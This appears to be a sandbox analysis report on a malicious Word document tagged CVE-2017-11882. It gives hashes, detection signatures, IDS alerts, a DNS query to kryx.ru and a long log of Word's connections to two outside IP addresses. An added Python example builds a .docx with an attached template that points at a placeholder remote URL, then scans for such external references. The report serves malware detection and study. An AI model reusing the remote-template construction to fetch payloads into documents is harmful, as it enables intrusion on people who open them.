Windows Analysis Report
_________03M4138.docx.bin.doc

Overview

General Information

Sample name: _________03M4138.docx.bin.doc
Analysis ID: 1638538
MD5: 5651f8c9b317bc1b3f23d406590255c1
SHA1: f217e8fbb37c65867bbeecb2a6d6f0d556e91410
SHA256: c4ca2614797569a0427242f6db7e5cc00be0d0edb358629a9350e31b5a7f4e49
Tags: cve-2017-11882, doc, docx, user-TornadoAV_dev

Detection

Score: 60
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains an external reference to another file
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
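The signature "Contains an external reference to another file" is the static side of what the rest of this report shows dynamically: a relationship inside the document package points at a remote target, and Word fetches it on open with its own `ms-office` user agent. As an added example (not Joe Sandbox's detection code, and independent of this sample, whose internals the report does not show), the Python below constructs a minimal .docx with an external `attachedTemplate` relationship and scans every `.rels` part for `TargetMode="External"`. The template URL is a placeholder, not an indicator from the report.

```python
"""Find external relationships in a Word OOXML package.

Added example for this report, not Joe Sandbox's detection code. A .docx is a
ZIP of XML parts; a <Relationship> with TargetMode="External" in any *.rels
part tells Word to fetch the Target when the document is opened (an attached
template, a remote OLE object, a linked image). That fetch is what the report's
"Contains an external reference to another file" signature describes.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def external_relationships(docx_bytes):
    """Return one dict per external relationship: the .rels part that declares
    it, the relationship type (last path segment, e.g. 'attachedTemplate') and
    the remote target. Internal relationships (no TargetMode) are ignored."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append({
                        "part": name,
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": rel.get("Target", ""),
                    })
    return found


def build_sample_docx(template_url=None):
    """Constructed sample package (not the analysed file). With template_url
    set, word/settings.xml carries an attachedTemplate whose relationship points
    at that remote URL; without it the package has only internal relationships."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
        '</Types>'
    )
    root_rels = (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/officeDocument" Target="word/document.xml"/>'
        '</Relationships>'
    )
    document_rels = (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/settings" Target="settings.xml"/>'
        '</Relationships>'
    )
    document = (
        f'<w:document xmlns:w="{WORD_NS}"><w:body><w:p><w:r><w:t>Constructed sample'
        '</w:t></w:r></w:p></w:body></w:document>'
    )
    attached = '<w:attachedTemplate r:id="rId1"/>' if template_url else ""
    settings = f'<w:settings xmlns:w="{WORD_NS}" xmlns:r="{OFFICE_REL}">{attached}</w:settings>'

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/settings.xml", settings)
        if template_url:
            zf.writestr(
                "word/_rels/settings.xml.rels",
                f'<Relationships xmlns="{PKG_REL_NS}">'
                f'<Relationship Id="rId1" Type="{OFFICE_REL}/attachedTemplate" '
                f'Target="{template_url}" TargetMode="External"/>'
                '</Relationships>',
            )
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder URL: an assumption for the demo, not an indicator from the report.
    sample = build_sample_docx("http://example.invalid/remote.dotm")
    for rel in external_relationships(sample):
        print(f"{rel['part']}: {rel['type']} -> {rel['target']}")
```

Run the scanner over a real suspect file with `external_relationships(open(path, "rb").read())`; a file that is a legacy OLE `.doc` rather than a ZIP raises `zipfile.BadZipFile`, which is itself worth recording, since this sample's name ends in `.doc` while its tags say `docx`.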

Classification

  • System is w11x64_office
  • WINWORD.EXE (PID: 7880, cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • cleanup
No configs have been found
No yara matches
Sigma match: Suspicious Office Outbound Connections (logsource: network connection; rule author: X__Junior, Nextron Systems). Matching event: EventID 3, Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7880, Protocol: tcp, Initiated: true, SourceIp: 188.225.72.170, SourcePort: 443, SourceIsIpv6: false, DestinationIp: 192.168.2.24, DestinationPort: 53967, DestinationIsIpv6: false. Note that the event is recorded with the remote host as SourceIp and the analysis VM as DestinationIp even though Initiated is true for WINWORD.EXE; it is the same 53967 <-> 443 connection listed under TCP traffic below.
Suricata alerts:

Timestamp                         SID      Severity  Classtype                Source IP     Src Port  Destination IP   Dst Port  Protocol
2025-03-14T14:09:11.962199+0100   1810004  1         Potentially Bad Traffic  192.168.2.24  53975     188.225.72.170   443       TCP
2025-03-14T14:09:12.660437+0100   1810004  1         Potentially Bad Traffic  192.168.2.24  53977     213.165.70.90    80        TCP
2025-03-14T14:09:08.936799+0100   1810005  1         Potentially Bad Traffic  192.168.2.24  53969     188.225.72.170   443       TCP

AV Detection

barindex
Source: _________03M4138.docx.bin.docVirustotal: Detection: 9%Perma Link
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.24:53967 version: TLS 1.2
Source: global trafficDNS query: name: kryx.ru
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
